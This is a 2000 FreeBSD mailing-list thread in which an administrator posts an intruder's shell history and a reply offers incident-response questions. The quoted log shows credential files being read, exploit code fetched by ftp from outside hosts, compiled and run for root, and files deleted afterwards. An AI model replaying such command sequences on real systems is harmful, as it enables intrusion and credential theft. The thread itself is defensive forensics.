From owner-freebsd-questions Mon Dec 18 12:31:30 2000 From owner-freebsd-questions@FreeBSD.ORG Mon Dec 18 12:31:26 2000 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from borg.starbase.net (unknown [208.233.101.2]) by hub.freebsd.org (Postfix) with ESMTP id 549CB37B400 for ; Mon, 18 Dec 2000 12:31:25 -0800 (PST) Received: from localhost (alex@localhost) by borg.starbase.net (8.9.3/8.8.8) with ESMTP id PAA23648; Mon, 18 Dec 2000 15:31:02 -0500 (EST) Date: Mon, 18 Dec 2000 15:31:02 -0500 (EST) From: Alexander V P X-Sender: alex@borg.starbase.net To: "Gerald T. Freymann" Cc: Questions Subject: Re: Hacker history file - OUCH In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG hi, do you keep/have logs about what ftp transfers he did? did you send mail to root@he.net, or .mx domain? any idea how he break in? what freebsd you're using? if i'm on your place, i'll unplug the box and try to find out more about this. don't do like most of the sysadmins that just wipe the box. alex On Mon, 18 Dec 2000, Gerald T. Freymann wrote: > > > Seems we have an intruder on one of our boxes... the .history file from the > troubled account follows: > > cd bnc > ls > ./bash > who > cd /etc > more passwd > ps -l > ls -l > more pwd.db > more hosts > pico adduser.conf.bak > pico group > su user > pico group.bak > pico ftpuser > O > pico ftpusers > su toor > su operator > id > pico spwd.db > su wheel > pico passwd > cd /var/tmp > ls -a > cd ... > ls -a > cd .. > ls -l > ls -al > cd ... > ftp copper.he.net > chmod u+x xcon > ./xcon > id > rm * > ls > who > cd /var/tmp > ls -a > ls -al > cd ... > ls -a > ftp cih.edu.mx > ls > cc bsd1 bsd-cron.c > cc -o bsd1 bsd-cron.c > ./bsd1 > id > cc -o bsd2 bsd2.c > ./bsd2 > id > ls > ftp cih.edu.mx > ./bsd sh > ./bsd.sh > chmod u+x bsd.sh > ./bsd.sh > /tmp/sh > id > ls > cc -o bsdsmail bsdsmail.c > ./bsdsmail > ls -a > pico hack > ls > pico user.inf > ls > id > rm * > exit > > Anybody recognize what the intruder has set up? > > -Gerry > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message